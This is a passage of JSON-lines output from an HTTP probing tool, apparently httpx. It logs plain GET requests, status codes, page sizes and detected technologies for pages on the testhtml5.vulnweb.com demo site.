ets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=87b02f8faa8c1a09c829865c475b5975\",\"time\":\"352.362533ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.08757672Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=932986deac1c09c70b8a7bd425406ddc\",\"input\":\"http://testhtml5.vulnweb.com/like?id=932986deac1c09c70b8a7bd425406ddc\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=932986deac1c09c70b8a7bd425406ddc\",\"time\":\"343.400088ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.361009634Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=94b2176bf4bfc26aa199760463b5ac18\",\"input\":\"http://testhtml5.vulnweb.com/like?id=94b2176bf4bfc26aa199760463b5ac18\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=94b2176bf4bfc26aa199760463b5ac18\",\"time\":\"353.413484ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.448326031Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=9fe7a1ee94d2ed27b641f4471d211610\",\"input\":\"http://testhtml5.vulnweb.com/like?id=9fe7a1ee94d2ed27b641f4471d211610\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=9fe7a1ee94d2ed27b641f4471d211610\",\"time\":\"339.800473ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.487907109Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=a3761ccd0d4419e7e9d0c5a0b5583445\",\"input\":\"http://testhtml5.vulnweb.com/like?id=a3761ccd0d4419e7e9d0c5a0b5583445\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=a3761ccd0d4419e7e9d0c5a0b5583445\",\"time\":\"340.182382ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.628858847Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=aaf3092d419422cca17a609c5d1d235f\",\"input\":\"http://testhtml5.vulnweb.com/like?id=aaf3092d419422cca17a609c5d1d235f\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=aaf3092d419422cca17a609c5d1d235f\",\"time\":\"352.736239ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.632132765Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=af9290a9e8bcd162818d45e5de1c6bef\",\"input\":\"http://testhtml5.vulnweb.com/like?id=af9290a9e8bcd162818d45e5de1c6bef\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=af9290a9e8bcd162818d45e5de1c6bef\",\"time\":\"343.565182ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.671200578Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=b045813e54c9dfeccaf6bfde5a9e87e4\",\"input\":\"http://testhtml5.vulnweb.com/like?id=b045813e54c9dfeccaf6bfde5a9e87e4\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=b045813e54c9dfeccaf6bfde5a9e87e4\",\"time\":\"349.734973ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.684417021Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=b4d50f99db49ff3d7d612a3b5e82b833\",\"input\":\"http://testhtml5.vulnweb.com/like?id=b4d50f99db49ff3d7d612a3b5e82b833\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=b4d50f99db49ff3d7d612a3b5e82b833\",\"time\":\"353.037012ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.684929784Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=b827d3c27534fd336f46b3aeabc1ff08\",\"input\":\"http://testhtml5.vulnweb.com/like?id=b827d3c27534fd336f46b3aeabc1ff08\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=b827d3c27534fd336f46b3aeabc1ff08\",\"time\":\"351.440723ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.706069324Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=cbe23fd8b33eeb0d70344ee753626698\",\"input\":\"http://testhtml5.vulnweb.com/like?id=cbe23fd8b33eeb0d70344ee753626698\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=cbe23fd8b33eeb0d70344ee753626698\",\"time\":\"348.0855ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.725535896Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=cf4d6c2961e4645eb906cc73452fce1e\",\"input\":\"http://testhtml5.vulnweb.com/like?id=cf4d6c2961e4645eb906cc73452fce1e\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=cf4d6c2961e4645eb906cc73452fce1e\",\"time\":\"343.987663ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.736939026Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=d11aec1e3f0c5b0ad4216a782f8d28c8\",\"input\":\"http://testhtml5.vulnweb.com/like?id=d11aec1e3f0c5b0ad4216a782f8d28c8\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=d11aec1e3f0c5b0ad4216a782f8d28c8\",\"time\":\"352.985846ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.761717529Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=d9c866cb39b7b8f9b26abd7312a5808f\",\"input\":\"http://testhtml5.vulnweb.com/like?id=d9c866cb39b7b8f9b26abd7312a5808f\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=d9c866cb39b7b8f9b26abd7312a5808f\",\"time\":\"352.736054ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.785144327Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=e2c2fc2b15ad51ab0f954234af01ecb9\",\"input\":\"http://testhtml5.vulnweb.com/like?id=e2c2fc2b15ad51ab0f954234af01ecb9\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=e2c2fc2b15ad51ab0f954234af01ecb9\",\"time\":\"351.602588ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.904663923Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=e3824121332e609769f4d1cffe79ad44\",\"input\":\"http://testhtml5.vulnweb.com/like?id=e3824121332e609769f4d1cffe79ad44\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=e3824121332e609769f4d1cffe79ad44\",\"time\":\"344.015952ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:43.940779326Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=e66e6688e7b4bb42eb5af74ef9acafea\",\"input\":\"http://testhtml5.vulnweb.com/like?id=e66e6688e7b4bb42eb5af74ef9acafea\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=e66e6688e7b4bb42eb5af74ef9acafea\",\"time\":\"343.729589ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:44.849060131Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=f239f69c075f10cc48df4cc9e7a3a457\",\"input\":\"http://testhtml5.vulnweb.com/like?id=f239f69c075f10cc48df4cc9e7a3a457\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=f239f69c075f10cc48df4cc9e7a3a457\",\"time\":\"358.241938ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:44.852810647Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=ebe93fea0729ba34a3a9503dab2e1b98\",\"input\":\"http://testhtml5.vulnweb.com/like?id=ebe93fea0729ba34a3a9503dab2e1b98\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=ebe93fea0729ba34a3a9503dab2e1b98\",\"time\":\"361.981174ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:51.81924204Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/like?id=fa00b1ed6ef78275a96eb27a075e862b\",\"input\":\"http://testhtml5.vulnweb.com/like?id=fa00b1ed6ef78275a96eb27a075e862b\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like?id=fa00b1ed6ef78275a96eb27a075e862b\",\"time\":\"353.926695ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4526,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:51.845997797Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"input\":\"http://testhtml5.vulnweb.com/login\",\"title\":\"405 Method Not Allowed\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login\",\"time\":\"348.791021ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":20,\"lines\":5,\"status_code\":405,\"content_length\":178,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:51.858432761Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/popular\",\"input\":\"http://testhtml5.vulnweb.com/popular\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/popular\",\"time\":\"348.597871ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:52.821542096Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/popular/page/:page\",\"input\":\"http://testhtml5.vulnweb.com/popular/page/:page\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/popular/page/:page\",\"time\":\"353.045042ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:52.830738846Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/redir\",\"input\":\"http://testhtml5.vulnweb.com/redir\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir\",\"time\":\"344.160157ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.014441641Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=011dc54012e965efaf58a4fc21785602\",\"input\":\"http://testhtml5.vulnweb.com/report?id=011dc54012e965efaf58a4fc21785602\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=011dc54012e965efaf58a4fc21785602\",\"time\":\"348.393031ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.071088985Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=0361ec55570dbf90305322914eff6fab\",\"input\":\"http://testhtml5.vulnweb.com/report?id=0361ec55570dbf90305322914eff6fab\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=0361ec55570dbf90305322914eff6fab\",\"time\":\"340.06775ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.226029888Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=24e47eb911c4d9526f32bf4f7db3e47b\",\"input\":\"http://testhtml5.vulnweb.com/report?id=24e47eb911c4d9526f32bf4f7db3e47b\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=24e47eb911c4d9526f32bf4f7db3e47b\",\"time\":\"345.464217ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.256070663Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=287458f26278ec644c4588be49dc13d1\",\"input\":\"http://testhtml5.vulnweb.com/report?id=287458f26278ec644c4588be49dc13d1\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=287458f26278ec644c4588be49dc13d1\",\"time\":\"341.241914ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.310892636Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=2d378ee65f2095fab6db54fd7ba9e230\",\"input\":\"http://testhtml5.vulnweb.com/report?id=2d378ee65f2095fab6db54fd7ba9e230\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=2d378ee65f2095fab6db54fd7ba9e230\",\"time\":\"347.606817ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.379254079Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=3bf174abb37bee6983637c6c2c63c5ac\",\"input\":\"http://testhtml5.vulnweb.com/report?id=3bf174abb37bee6983637c6c2c63c5ac\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=3bf174abb37bee6983637c6c2c63c5ac\",\"time\":\"344.885977ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.434911394Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=3d1e4f11e73f615d2a637a7019ee102f\",\"input\":\"http://testhtml5.vulnweb.com/report?id=3d1e4f11e73f615d2a637a7019ee102f\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=3d1e4f11e73f615d2a637a7019ee102f\",\"time\":\"352.457267ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.445444829Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=3ede9b978e3eec35cffd3fe6be9557bc\",\"input\":\"http://testhtml5.vulnweb.com/report?id=3ede9b978e3eec35cffd3fe6be9557bc\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=3ede9b978e3eec35cffd3fe6be9557bc\",\"time\":\"340.187848ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.733062094Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=43601f801cefcdada02e216479b6ea31\",\"input\":\"http://testhtml5.vulnweb.com/report?id=43601f801cefcdada02e216479b6ea31\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=43601f801cefcdada02e216479b6ea31\",\"time\":\"355.52399ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.816119801Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=4fdbbdff61b03be25dbc19bbdda9a34b\",\"input\":\"http://testhtml5.vulnweb.com/report?id=4fdbbdff61b03be25dbc19bbdda9a34b\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=4fdbbdff61b03be25dbc19bbdda9a34b\",\"time\":\"351.535982ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.853726386Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=5368ada7e1aba172289c1c171feed4b6\",\"input\":\"http://testhtml5.vulnweb.com/report?id=5368ada7e1aba172289c1c171feed4b6\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=5368ada7e1aba172289c1c171feed4b6\",\"time\":\"345.310203ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.993313206Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=55d07e974b77d74f6dc469eeb58fa245\",\"input\":\"http://testhtml5.vulnweb.com/report?id=55d07e974b77d74f6dc469eeb58fa245\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=55d07e974b77d74f6dc469eeb58fa245\",\"time\":\"351.327401ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:53.993677183Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=57bb2f7b14940a48a3ef789c98125cd9\",\"input\":\"http://testhtml5.vulnweb.com/report?id=57bb2f7b14940a48a3ef789c98125cd9\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=57bb2f7b14940a48a3ef789c98125cd9\",\"time\":\"343.264369ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4487,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:19:54.034212939Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/report?id=5907c1c85c4e5dad5dbeec90a9e42503\",\"input\":\"http://testhtml5.vulnweb.com/report?id=5907c1c85c4e5dad5dbeec90a9e42503\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report?id=5907c1c85c4e5dad5dbeec90a9e42503\",\"time